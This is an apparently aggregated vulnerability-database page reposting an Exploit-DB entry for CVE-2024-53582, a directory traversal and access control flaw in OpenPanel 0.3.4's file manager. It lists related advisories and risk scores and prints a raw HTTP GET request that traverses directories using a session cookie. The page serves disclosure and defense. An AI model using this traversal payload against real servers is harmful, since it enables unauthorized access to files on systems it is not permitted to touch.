OpenPanel 0.3.4 - Incorrect Access Control

🗓️ 14 Apr 2025 00:00:00Reported by Korn Chaisuwan, Charanin Thongudom, Pongtorn AngsuchotmeteeType

exploitdb🔗 www.exploit-db.com👁 254 Views

OpenPanel 0.3.4 has an incorrect access control vulnerability allowing unauthorized access.

Reporter	Title	Published	Views	Family All 12
0day.today	OpenPanel 0.3.4 Directory Traversal Vulnerability	30 Jan 202500:00	–	zdt
Circl	CVE-2024-53582	31 Jan 202516:16	–	circl
CNNVD	OpenPanel 安全漏洞	31 Jan 202500:00	–	cnnvd
CVE	CVE-2024-53582	31 Jan 202500:00	–	cve
Cvelist	CVE-2024-53582	31 Jan 202500:00	–	cvelist
Exploit DB	OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal	14 Apr 202500:00	–	exploitdb
EUVD	EUVD-2024-51999	3 Oct 202520:07	–	euvd
NVD	CVE-2024-53582	31 Jan 202516:15	–	nvd
Packet Storm	OpenPanel 0.3.4 Directory Traversal	29 Jan 202500:00	–	packetstorm
Positive Technologies	PT-2025-2970 · Openpanel · Openpanel	31 Jan 202500:00	–	ptsecurity

# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582

GET /files/../.. HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

14 Apr 2025 00:00Current

7.7High risk

Vulners AI Score7.7

CVSS 3.17.5

EPSS0.03067

SSVC